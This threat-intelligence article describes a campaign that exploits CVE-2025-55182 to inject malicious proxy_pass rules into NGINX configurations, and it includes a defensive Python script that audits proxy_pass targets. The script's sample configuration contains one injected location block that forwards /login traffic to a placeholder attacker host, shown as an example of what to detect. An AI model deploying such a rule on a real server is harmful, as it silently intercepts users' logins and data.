A pervasive and highly sophisticated web traffic hijacking campaign is actively compromising NGINX servers worldwide, leveraging a critical vulnerability to silently intercept and reroute user data through attacker-controlled infrastructure. This large-scale operation underscores a growing threat where the very architecture designed to manage and accelerate web traffic is weaponized against its users. The campaign’s success hinges on its stealth, as compromised servers continue to function normally, masking the malicious redirection occurring in the background. Threat actors are exploiting the trust between users and websites, turning legitimate digital destinations into conduits for their activities. Cybersecurity researchers have traced this activity to the exploitation of a severe vulnerability, revealing a methodical approach that targets specific web server configurations and geographic regions with alarming precision, leaving a trail of compromised systems that serve as unwitting accomplices in this widespread digital heist.
The Mechanics of The Hijacking Campaign
The foundation of this attack rests on the exploitation of React2Shell (CVE-2025-55182), a vulnerability assigned the maximum possible CVSS severity score of 10.0, indicating its critical nature and ease of exploitation. Upon gaining initial access to a vulnerable server, the threat actors focus their efforts on manipulating NGINX, one of the most popular open-source reverse proxy and load-balancing solutions. The primary tool for the hijack is the proxy_pass directive, a standard NGINX feature used to pass requests to backend servers. The attackers inject malicious location blocks into the NGINX configuration files. These carefully crafted blocks are designed to match specific URL paths. When a user sends a request to one of these paths, the malicious proxy_pass directive intercepts it and forwards it to the attackers’ own backend servers. The user’s communication is effectively hijacked, passing through the threat actor’s infrastructure before potentially reaching its intended destination, allowing for data interception, modification, or the serving of malicious content.
Further analysis of the campaign reveals the use of a multi-component toolkit that automates the compromise and ensures its persistence. This toolkit is composed of several specialized shell scripts, each with a distinct role in the attack chain. An orchestrator script, zx.sh, is responsible for downloading and executing the other components, cleverly using curl or wget and even capable of establishing a raw TCP connection to bypass security measures that might block these common utilities. Another script, bt.sh, is specifically designed to target environments using the popular Baota (BT) Management Panel, overwriting NGINX configurations within that specific ecosystem. To ensure the malicious directives are placed correctly, a script named 4zdh.sh enumerates common NGINX configuration file locations. A more targeted variant, zdh.sh, focuses on Linux or containerized NGINX instances, with a particular emphasis on servers located in specific regions. Finally, a reporting utility, ok.sh, generates a comprehensive list of all active traffic hijacking rules on the compromised server, allowing the attackers to maintain an inventory of their control.
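Because the hijack lives entirely in NGINX configuration, the defensive counterpart to the attackers' inventory script is an audit of every location block whose proxy_pass points somewhere the operator did not intend. The following Python script is an added example, not code from the article or from any of the scripts it names; the upstream allowlist and the configuration excerpt are constructed, and 203.0.113.45 is a TEST-NET placeholder rather than an address from the campaign.

```python
import re
from urllib.parse import urlsplit

# Hypothetical allowlist of the upstreams this server is expected to proxy to.
EXPECTED_UPSTREAMS = {"127.0.0.1", "localhost", "app-backend"}

# Constructed nginx.conf excerpt: one legitimate proxy_pass and one injected
# location block of the kind described above, forwarding a path off-host.
SAMPLE_CONF = """
server {
    listen 80;
    server_name example.edu;
    location / { root /var/www/html; }
    location /api/ {
        proxy_pass http://127.0.0.1:8080;
    }
    location /login {   # injected; 203.0.113.45 is a TEST-NET placeholder
        proxy_pass http://203.0.113.45:8000;
    }
}
"""

LOCATION_RE = re.compile(r"location\s+(?:[=~*^]+\s+)?([^\s{]+)\s*\{")
PROXY_RE = re.compile(r"proxy_pass\s+([^\s;]+)\s*;")

def location_blocks(text):
    """Yield (path, body) for every location block, honouring nested braces."""
    text = re.sub(r"#[^\n]*", "", text)          # drop comments first
    for m in LOCATION_RE.finditer(text):
        depth, i = 1, m.end()
        while i < len(text) and depth:
            depth += {"{": 1, "}": -1}.get(text[i], 0)
            i += 1
        yield m.group(1), text[m.end():i - 1]

def upstream_host(target):
    """Host part of a proxy_pass target; a bare '$var' upstream comes back as-is."""
    if "://" not in target:
        target = "http://" + target
    return urlsplit(target).hostname or target

def audit_proxy_pass(conf, allowed=EXPECTED_UPSTREAMS):
    """Return (path, target, host) for each proxy_pass whose host is not allow-listed."""
    findings = []
    for path, body in location_blocks(conf):
        for pm in PROXY_RE.finditer(body):
            host = upstream_host(pm.group(1))
            if host not in allowed:
                findings.append((path, pm.group(1), host))
    return findings
```

Run audit_proxy_pass over the contents of each file under /etc/nginx (and any panel-specific directories such as Baota's) and treat every finding, including variable-based upstreams, as a rule to be explained or removed.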
Targeting and Post-Exploitation Tactics
The operators of this campaign have demonstrated a clear and strategic targeting methodology, concentrating their efforts on specific geographic and infrastructural assets. A significant portion of the observed attacks have been directed at Asian top-level domains (TLDs), including .in (India), .id (Indonesia), .pe (Peru), .bd (Bangladesh), and .th (Thailand). This regional focus suggests a calculated effort to exploit areas with a high concentration of vulnerable systems or specific strategic value to the attackers. Beyond geographical boundaries, the campaign also exhibits a preference for Chinese hosting infrastructure. In particular, systems managed with the Baota Panel have been heavily targeted, likely due to its widespread use and potentially common configuration weaknesses. The most concerning aspect of the targeting strategy is the focus on sensitive domains, with evidence showing that government (.gov) and educational (.edu) websites are actively being compromised, raising the stakes from simple traffic redirection to potential espionage and theft of sensitive institutional data.
The exploitation of the React2Shell vulnerability serves as a gateway for diverse post-exploitation payloads, indicating that multiple, independent threat actors may be leveraging the same initial access vector for different malicious ends. Threat intelligence firm GreyNoise has reported that a substantial 56% of observed exploitation attempts originated from just two IP addresses, 193.142.147[.]209 and 87.121.84[.]24. While both sources exploit the same vulnerability, their ultimate objectives diverge significantly. One set of attacks deploys cryptomining software, hijacking the server’s computational resources for financial gain by mining cryptocurrencies. In contrast, the other campaign focuses on establishing reverse shells, which provide the attacker with direct, interactive command-line access to the compromised system. This level of access is far more intrusive, enabling data exfiltration, lateral movement within the network, and the deployment of additional malware. This divergence highlights a coordinated but multifaceted threat landscape where a single vulnerability can fuel a wide range of cybercriminal activities.
Fortifying Defenses Against Covert Threats
The extensive campaign targeting NGINX servers is a stark reminder of how fundamental web infrastructure can be subverted for malicious purposes. It shows that even well-established and widely used technologies are not immune to attacks that exploit both software vulnerabilities and common administrative practices. The attackers’ strategic focus on specific regions and high-value domains, such as government and educational institutions, underscores the calculated nature of modern cyber threats. That a single vulnerability serves as a gateway for varied payloads, from resource-draining cryptomining to reverse shells granting deep system access, illustrates the complex and layered motivations driving cybercrime. The incident calls for renewed focus on proactive security measures: timely patching, rigorous configuration management (including regular review of NGINX configuration files for location and proxy_pass directives the operator did not create), and threat detection capable of identifying the subtle anomalies that indicate a compromise. The defensive posture of the cybersecurity community is shifting toward a model of assumed breach, where continuous monitoring and rapid response are paramount in mitigating the impact of such covert and persistent threats.